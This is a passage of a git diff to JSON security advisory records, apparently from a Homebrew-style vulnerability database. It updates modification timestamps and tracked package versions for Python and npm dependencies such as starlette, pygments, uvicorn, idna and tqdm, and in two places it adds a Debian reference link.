"2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.0.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2026-48817.json b/advisories/BREW-gptme-CVE-2026-48817.json index 472e3cf232e..436124281a9 100644 --- a/advisories/BREW-gptme-CVE-2026-48817.json +++ b/advisories/BREW-gptme-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-48817", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2026-48818.json b/advisories/BREW-gptme-CVE-2026-48818.json index 11bd83155bc..7314b794fa5 100644 --- a/advisories/BREW-gptme-CVE-2026-48818.json +++ b/advisories/BREW-gptme-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-48818", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2026-54282.json b/advisories/BREW-gptme-CVE-2026-54282.json index 2a6613ba7ea..cdc029ccb0e 100644 --- a/advisories/BREW-gptme-CVE-2026-54282.json +++ b/advisories/BREW-gptme-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-54282", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2026-54283.json b/advisories/BREW-gptme-CVE-2026-54283.json index cf682f0d091..7b159544101 100644 --- a/advisories/BREW-gptme-CVE-2026-54283.json +++ b/advisories/BREW-gptme-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-54283", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2026-58203.json b/advisories/BREW-gptme-CVE-2026-58203.json index c4d8b21cb49..cc995727d66 100644 --- a/advisories/BREW-gptme-CVE-2026-58203.json +++ b/advisories/BREW-gptme-CVE-2026-58203.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-58203", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-4xgf-cpjx-pc3j", "CVE-2026-58203" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.14.2", "resource": "pydantic-settings", - "resource_purl": "pkg:pypi/pydantic-settings@2.14.2" + "resource_purl": "pkg:pypi/pydantic-settings@2.15.0" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-settings", - "subject_version": "2.14.2", - "key": "pkg:pypi/pydantic-settings@2.14.2", + "subject_version": "2.15.0", + "key": "pkg:pypi/pydantic-settings@2.15.0", "resource": "pydantic-settings" } ] diff --git a/advisories/BREW-gyb-CVE-2026-59939.json b/advisories/BREW-gyb-CVE-2026-59939.json index 30d451fc167..f138b52ee7a 100644 --- a/advisories/BREW-gyb-CVE-2026-59939.json +++ b/advisories/BREW-gyb-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gyb-CVE-2026-59939", "published": "2026-08-13T16:55:28Z", - "modified": "2026-08-13T16:55:28Z", + "modified": "2026-08-22T08:57:09Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -89,6 +89,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-hermes-agent-CVE-2015-8557.json b/advisories/BREW-hermes-agent-CVE-2015-8557.json index 940804978f1..101673332f4 100644 --- a/advisories/BREW-hermes-agent-CVE-2015-8557.json +++ b/advisories/BREW-hermes-agent-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2015-8557", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2020-7694.json b/advisories/BREW-hermes-agent-CVE-2020-7694.json index 7a7bc8347a4..8089a68e529 100644 --- a/advisories/BREW-hermes-agent-CVE-2020-7694.json +++ b/advisories/BREW-hermes-agent-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2020-7694", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-17T17:15:17Z", + "modified": "2026-08-22T08:58:07Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2020-7695.json b/advisories/BREW-hermes-agent-CVE-2020-7695.json index 5ff9a9ba9db..56db7d224e3 100644 --- a/advisories/BREW-hermes-agent-CVE-2020-7695.json +++ b/advisories/BREW-hermes-agent-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2020-7695", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-17T17:15:17Z", + "modified": "2026-08-22T08:58:07Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2021-20270.json b/advisories/BREW-hermes-agent-CVE-2021-20270.json index 8c95166672d..99f276e6d60 100644 --- a/advisories/BREW-hermes-agent-CVE-2021-20270.json +++ b/advisories/BREW-hermes-agent-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2021-20270", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2021-27291.json b/advisories/BREW-hermes-agent-CVE-2021-27291.json index cd6423046c9..949b8370dd0 100644 --- a/advisories/BREW-hermes-agent-CVE-2021-27291.json +++ b/advisories/BREW-hermes-agent-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2021-27291", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2022-40896.json b/advisories/BREW-hermes-agent-CVE-2022-40896.json index cc8d5c781b7..0ab97d40412 100644 --- a/advisories/BREW-hermes-agent-CVE-2022-40896.json +++ b/advisories/BREW-hermes-agent-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2022-40896", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2024-3651.json b/advisories/BREW-hermes-agent-CVE-2024-3651.json index 63aa50f0615..bd8592ce434 100644 --- a/advisories/BREW-hermes-agent-CVE-2024-3651.json +++ b/advisories/BREW-hermes-agent-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2024-3651", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2026-4539.json b/advisories/BREW-hermes-agent-CVE-2026-4539.json index f14e1d76455..30ca3deae10 100644 --- a/advisories/BREW-hermes-agent-CVE-2026-4539.json +++ b/advisories/BREW-hermes-agent-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2026-4539", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-hermes-agent-CVE-2026-45409.json b/advisories/BREW-hermes-agent-CVE-2026-45409.json index 9a3551b7332..f9c28ab5090 100644 --- a/advisories/BREW-hermes-agent-CVE-2026-45409.json +++ b/advisories/BREW-hermes-agent-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hermes-agent-CVE-2026-45409", "published": "2026-08-13T16:56:26Z", - "modified": "2026-08-13T16:56:26Z", + "modified": "2026-08-22T08:58:06Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-internetarchive-CVE-2016-10075.json b/advisories/BREW-internetarchive-CVE-2016-10075.json index 8598869fbcf..ff56d75adb9 100644 --- a/advisories/BREW-internetarchive-CVE-2016-10075.json +++ b/advisories/BREW-internetarchive-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-internetarchive-CVE-2016-10075", "published": "2026-08-13T16:59:59Z", - "modified": "2026-08-13T16:59:59Z", + "modified": "2026-08-22T09:01:06Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.11.2", "resource": "tqdm", - "resource_purl": "pkg:pypi/tqdm@4.69.0" + "resource_purl": "pkg:pypi/tqdm@4.70.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "tqdm", - "subject_version": "4.69.0", - "key": "pkg:pypi/tqdm@4.69.0", + "subject_version": "4.70.0", + "key": "pkg:pypi/tqdm@4.70.0", "resource": "tqdm" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "tqdm", - "subject_version": "4.69.0", - "key": "pkg:pypi/tqdm@4.69.0", + "subject_version": "4.70.0", + "key": "pkg:pypi/tqdm@4.70.0", "resource": "tqdm" } ] diff --git a/advisories/BREW-internetarchive-CVE-2024-34062.json b/advisories/BREW-internetarchive-CVE-2024-34062.json index 758ab488b28..78ac413850f 100644 --- a/advisories/BREW-internetarchive-CVE-2024-34062.json +++ b/advisories/BREW-internetarchive-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-internetarchive-CVE-2024-34062", "published": "2026-08-13T16:59:59Z", - "modified": "2026-08-13T16:59:59Z", + "modified": "2026-08-22T09:01:06Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.66.3", "resource": "tqdm", - "resource_purl": "pkg:pypi/tqdm@4.69.0" + "resource_purl": "pkg:pypi/tqdm@4.70.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "tqdm", - "subject_version": "4.69.0", - "key": "pkg:pypi/tqdm@4.69.0", + "subject_version": "4.70.0", + "key": "pkg:pypi/tqdm@4.70.0", "resource": "tqdm" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "tqdm", - "subject_version": "4.69.0", - "key": "pkg:pypi/tqdm@4.69.0", + "subject_version": "4.70.0", + "key": "pkg:pypi/tqdm@4.70.0", "resource": "tqdm" } ] diff --git a/advisories/BREW-internetarchive-CVE-2024-3651.json b/advisories/BREW-internetarchive-CVE-2024-3651.json index 9286a0ea702..ba9cb1970b9 100644 --- a/advisories/BREW-internetarchive-CVE-2024-3651.json +++ b/advisories/BREW-internetarchive-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-internetarchive-CVE-2024-3651", "published": "2026-08-13T16:59:59Z", - "modified": "2026-08-13T16:59:59Z", + "modified": "2026-08-22T09:01:06Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-internetarchive-CVE-2025-58438.json b/advisories/BREW-internetarchive-CVE-2025-58438.json index dd0bfb87ee3..1510ccbfc12 100644 --- a/advisories/BREW-internetarchive-CVE-2025-58438.json +++ b/advisories/BREW-internetarchive-CVE-2025-58438.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-internetarchive-CVE-2025-58438", "published": "2026-08-13T16:59:59Z", - "modified": "2026-08-13T16:59:59Z", + "modified": "2026-08-22T09:01:06Z", "upstream": [ "CVE-2025-58438", "GHSA-wx3r-v6h7-frjp", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/jjjake/internetarchive", - "subject_version": "5.11.0", + "subject_version": "5.11.1", "key": "https://github.com/jjjake/internetarchive" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "internetarchive", - "subject_version": "5.11.0", - "key": "pkg:pypi/internetarchive@5.11.0" + "subject_version": "5.11.1", + "key": "pkg:pypi/internetarchive@5.11.1" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "internetarchive", - "subject_version": "5.11.0", - "key": "pkg:pypi/internetarchive@5.11.0" + "subject_version": "5.11.1", + "key": "pkg:pypi/internetarchive@5.11.1" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/jjjake/internetarchive", - "subject_version": "5.11.0", + "subject_version": "5.11.1", "key": "upstream:https://github.com/jjjake/internetarchive" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "internetarchive", - "subject_version": "5.11.0", - "key": "upstream:pkg:pypi/internetarchive@5.11.0" + "subject_version": "5.11.1", + "key": "upstream:pkg:pypi/internetarchive@5.11.1" }, { "strategy": "distro", diff --git a/advisories/BREW-internetarchive-CVE-2026-45409.json b/advisories/BREW-internetarchive-CVE-2026-45409.json index 416768936dd..276db585286 100644 --- a/advisories/BREW-internetarchive-CVE-2026-45409.json +++ b/advisories/BREW-internetarchive-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-internetarchive-CVE-2026-45409", "published": "2026-08-13T16:59:59Z", - "modified": "2026-08-13T16:59:59Z", + "modified": "2026-08-22T09:01:06Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-mcp-google-sheets-CVE-2026-59939.json b/advisories/BREW-mcp-google-sheets-CVE-2026-59939.json index 5c8dd961422..6b7056c6ed2 100644 --- a/advisories/BREW-mcp-google-sheets-CVE-2026-59939.json +++ b/advisories/BREW-mcp-google-sheets-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcp-google-sheets-CVE-2026-59939", "published": "2026-08-13T17:13:13Z", - "modified": "2026-08-13T17:13:13Z", + "modified": "2026-08-22T09:13:26Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-mcp-inspector-CVE-2025-49596.json b/advisories/BREW-mcp-inspector-CVE-2025-49596.json index 07ae864e623..26b6ece88be 100644 --- a/advisories/BREW-mcp-inspector-CVE-2025-49596.json +++ b/advisories/BREW-mcp-inspector-CVE-2025-49596.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcp-inspector-CVE-2025-49596", "published": "2026-08-13T17:13:13Z", - "modified": "2026-08-13T20:58:04Z", + "modified": "2026-08-22T09:13:26Z", "upstream": [ "GHSA-7f8r-222p-6f5g", "CVE-2025-49596" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "@modelcontextprotocol/inspector", - "subject_version": "2.2.0", - "key": "pkg:npm/%40modelcontextprotocol/inspector@2.2.0" + "subject_version": "2.3.0", + "key": "pkg:npm/%40modelcontextprotocol/inspector@2.3.0" } ] }, diff --git a/advisories/BREW-mcp-inspector-CVE-2025-58444.json b/advisories/BREW-mcp-inspector-CVE-2025-58444.json index dea75388ca2..eb9952ddf29 100644 --- a/advisories/BREW-mcp-inspector-CVE-2025-58444.json +++ b/advisories/BREW-mcp-inspector-CVE-2025-58444.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcp-inspector-CVE-2025-58444", "published": "2026-08-13T17:13:13Z", - "modified": "2026-08-13T20:58:04Z", + "modified": "2026-08-22T09:13:26Z", "upstream": [ "GHSA-g9hg-qhmf-q45m", "CVE-2025-58444" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "@modelcontextprotocol/inspector", - "subject_version": "2.2.0", - "key": "pkg:npm/%40modelcontextprotocol/inspector@2.2.0" + "subject_version": "2.3.0", + "key": "pkg:npm/%40modelcontextprotocol/inspector@2.3.0" } ] }, diff --git a/advisories/BREW-mesa-CVE-2010-2480.json b/advisories/BREW-mesa-CVE-2010-2480.json index bd763a611f9..ee731b4d492 100644 --- a/advisories/BREW-mesa-CVE-2010-2480.json +++ b/advisories/BREW-mesa-CVE-2010-2480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mesa-CVE-2010-2480", "published": "2026-08-13T17:13:21Z", - "modified": "2026-08-13T17:13:21Z", + "modified": "2026-08-22T09:13:32Z", "upstream": [ "GHSA-7q8x-38mc-p84f", "CVE-2010-2480", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.3.4", "resource": "mako", - "resource_purl": "pkg:pypi/mako@1.3.12" + "resource_purl": "pkg:pypi/mako@1.4.1" } } ], @@ 